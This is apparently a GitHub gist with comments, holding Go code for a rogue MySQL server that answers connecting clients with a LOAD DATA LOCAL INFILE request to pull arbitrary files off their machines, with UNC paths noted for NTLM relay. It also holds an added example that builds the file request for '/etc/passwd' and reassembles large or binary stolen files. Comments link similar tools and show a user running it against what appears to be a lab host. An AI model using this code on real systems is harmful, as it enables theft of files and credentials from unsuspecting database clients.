@bmaia
Last active May 4, 2020 19:37
```go
// Excerpt of the accept loop of the rogue MySQL server module. The receiver
// mysql (with its listener and infile fields), the log package and the canned
// packets MySQLGreeting, FirstResponseOK, GetFile and SecondResponseOK are
// defined elsewhere in the module and are not shown here.
for mysql.Running() {
	// tcp listener
	conn, err := mysql.listener.AcceptTCP()
	if err != nil {
		log.Warning("Error while accepting TCP connection: %s", err)
		continue
	}
	// send the mysql greeting (server handshake) and read the client's login packet
	// TODO: include binary support and files > 16kb
	conn.Write([]byte(MySQLGreeting))
	b := make([]byte, 16384)
	conn.Read(b)
	// parse client capabilities and validate connection
	// TODO: parse mysql connections properly and
	// display additional connection attributes
	// the capability flags are the first two bytes after the 4-byte packet header:
	// 0x8000 = CLIENT_SECURE_CONNECTION (set by every modern client, used as a sanity check)
	// 0x0080 = CLIENT_LOCAL_FILES (the client will honour a LOAD DATA LOCAL request)
	clientCapabilities := uint32(b[4]) | uint32(b[5])<<8
	if clientCapabilities&0x8000 != 0 {
		remoteAddress, _, _ := net.SplitHostPort(conn.RemoteAddr().String())
		log.Info("MySQL connection from: %s", remoteAddress)
		loadData := clientCapabilities&0x0080 != 0
		log.Info("Can Use LOAD DATA LOCAL: %t", loadData)
		// the username is the NUL-terminated string after header(4), capabilities(4),
		// max packet size(4), charset(1) and 23 reserved bytes
		username := bytes.Split(b[36:], []byte{0})[0]
		log.Info("MySQL Login Request Username: %s", username)
		// send initial responseOK and wait for the client's first query
		conn.Write([]byte(FirstResponseOK))
		conn.Read(b)
		// answer that query with a LOCAL INFILE request for mysql.infile
		conn.Write([]byte(GetFile))
		infileLen, err := conn.Read(b)
		if err != nil || infileLen < 8 {
			log.Warning("Error while reading infile response (%d bytes): %v", infileLen, err)
			conn.Close()
			continue
		}
		// check if the infile is an UNC path
		if strings.HasPrefix(mysql.infile, "\\") {
			log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile)
		} else {
			// print the infile content, ignore mysql protocol headers
			// TODO: include binary support and output to a file
			log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b[4:infileLen-4]))
		}
		// send additional response
		conn.Write([]byte(SecondResponseOK))
		conn.Read(b)
	}
	conn.Close()
}
```
(...)
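The two TODOs in the loop above (parse the connection properly; handle binary content and files larger than the single 16 KB read) come down to honouring the MySQL packet framing. The following is an added example, not code from the gist or from bettercap: it parses the client's HandshakeResponse41 packet with a bitmask instead of the binary-string trick, builds the 0xFB LOCAL INFILE request (the packet the thread below suggests capturing from a real MariaDB server and replaying), and reassembles the file from the client's packet stream, coping with binary content and files that span several packets. The function names, the constructed sample handshake packet and the simulated client stream are assumptions of this example; the packet layout is the documented MySQL client/server protocol.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
)

// Capability flag bits from the low 16 bits of the client's HandshakeResponse41.
const ClientLocalFiles uint32 = 0x0080 // CLIENT_LOCAL_FILES: client will honour LOAD DATA LOCAL
const ClientProtocol41 uint32 = 0x0200 // CLIENT_PROTOCOL_41: 4.1+ packet layout

// packet wraps a payload in the MySQL wire header: 3-byte little-endian length + sequence id.
func packet(payload []byte, seq byte) []byte {
	n := len(payload)
	return append([]byte{byte(n), byte(n >> 8), byte(n >> 16), seq}, payload...)
}

// ParseHandshakeResponse returns capability flags and username from a HandshakeResponse41
// packet (header included): header(4) | caps(4) | max packet(4) | charset(1) | reserved(23) | user NUL | ...
func ParseHandshakeResponse(pkt []byte) (caps uint32, username string, err error) {
	if len(pkt) < 36 {
		return 0, "", errors.New("packet too short for HandshakeResponse41")
	}
	payloadLen := int(pkt[0]) | int(pkt[1])<<8 | int(pkt[2])<<16
	if payloadLen < 33 || len(pkt) < 4+payloadLen {
		return 0, "", errors.New("truncated HandshakeResponse41")
	}
	p := pkt[4 : 4+payloadLen]
	caps = binary.LittleEndian.Uint32(p[0:4])
	if caps&ClientProtocol41 == 0 {
		return 0, "", errors.New("pre-4.1 handshake response not supported")
	}
	end := bytes.IndexByte(p[32:], 0) // username starts after max packet, charset and reserved bytes
	if end < 0 {
		return 0, "", errors.New("username not NUL-terminated")
	}
	return caps, string(p[32 : 32+end]), nil
}

// CanUseLoadDataLocal reports whether the client advertised CLIENT_LOCAL_FILES (the bit the gist reads as character 8 of its binary string).
func CanUseLoadDataLocal(caps uint32) bool { return caps&ClientLocalFiles != 0 }

// LocalInfileRequest is the server's answer to the client's first query, whatever it was:
// 0xFB followed by the filename (no terminator), sequence id 1.
func LocalInfileRequest(filename string) []byte {
	return packet(append([]byte{0xFB}, filename...), 1)
}

// ReadInfile reassembles the file the client streams back: packets of raw (possibly binary)
// file bytes terminated by an empty packet, so files larger than one read are handled.
func ReadInfile(stream []byte) (content []byte, consumed int, err error) {
	for off := 0; ; {
		if len(stream)-off < 4 {
			return nil, off, errors.New("truncated packet header")
		}
		n := int(stream[off]) | int(stream[off+1])<<8 | int(stream[off+2])<<16
		off += 4
		if n == 0 { // empty packet: end of transfer
			return content, off, nil
		}
		if len(stream)-off < n {
			return nil, off, errors.New("truncated packet body")
		}
		content = append(content, stream[off:off+n]...)
		off += n
	}
}

// ClientInfileStream simulates the client side (constructed for this example):
// the file split into packets of at most maxChunk bytes, then the empty terminator.
func ClientInfileStream(content []byte, maxChunk int, seq byte) []byte {
	var stream []byte
	for off := 0; off < len(content); off += maxChunk {
		end := off + maxChunk
		if end > len(content) {
			end = len(content)
		}
		stream = append(stream, packet(content[off:end], seq)...)
		seq++
	}
	return append(stream, packet(nil, seq)...)
}

// sampleHandshakeResponse is a constructed login packet: caps 0x00088285 (LONG_PASSWORD, LONG_FLAG, LOCAL_FILES,
// PROTOCOL_41, SECURE_CONNECTION, PLUGIN_AUTH), max packet 16 MiB, charset utf8, user "root", no password.
var sampleHandshakeResponse = packet(append(append(append(
	[]byte{0x85, 0x82, 0x08, 0x00, 0x00, 0x00, 0x00, 0x01, 0x21}, make([]byte, 23)...),
	"root\x00\x00"...), "mysql_native_password\x00"...), 1)

func main() {
	caps, user, err := ParseHandshakeResponse(sampleHandshakeResponse)
	fmt.Printf("user=%q caps=%#x local_infile=%v err=%v\n", user, caps, CanUseLoadDataLocal(caps), err)
	file := bytes.Repeat([]byte("root:x:0:0::/root:/bin/sh\n"), 2000) // ~52 KB, spans several packets
	got, n, err := ReadInfile(ClientInfileStream(file, 16384, 2))
	fmt.Printf("request % x\nreassembled %d bytes from %d stream bytes, intact=%v, err=%v\n", LocalInfileRequest("/etc/passwd"), len(got), n, bytes.Equal(got, file), err)
}
```

Inside the accept loop, ReadInfile would be fed the bytes accumulated from repeated conn.Read calls until it no longer reports a truncated header, instead of a single 16 KB read, and the reassembled bytes would be written to a file rather than logged as a string. Note that the 0xFB request is sent in reply to whatever query the client issues first, so no query text needs to be replayed from the capture.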
bmaia (Author) commented May 4, 2020

You can try to use other Rogue MySQL clients like the one below:

https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py

The best thing to do would be to set up a MariaDB 10.3.22 server, use a client to LOAD DATA INFILE, check the MySQL packets and try to replay them (see the snippets below for an example):

https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py#L112-L114

load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

The post below is a good (and more recent) reference:

https://medium.com/@knownsec404team/mysql-client-arbitrary-file-reading-attack-chain-extension-727bb63f578c

guanicoe commented May 4, 2020

OK, I'll give it a try. I did first try https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py, but it spat a lot of exceptions, and after reading your post https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html I thought I'd give bettercap a try as everything was integrated.

#python rogue_mysql_server.py 
error: uncaptured python exception, closing channel <__main__.http_request_handler connected 10.10.10.187:49106 at 0x7fcd7c36f050> (<type 'exceptions.ValueError'>: [/usr/lib/python2.7/asyncore.py|read|83] [/usr/lib/python2.7/asyncore.py|handle_read_event|449] [/usr/lib/python2.7/asynchat.py|handle_read|147] [rogue_mysql_server.py|found_terminator|184])

guanicoe commented May 4, 2020

Just to let you know that your module works great, and that I was to blame. The error came from a malformed SQL query.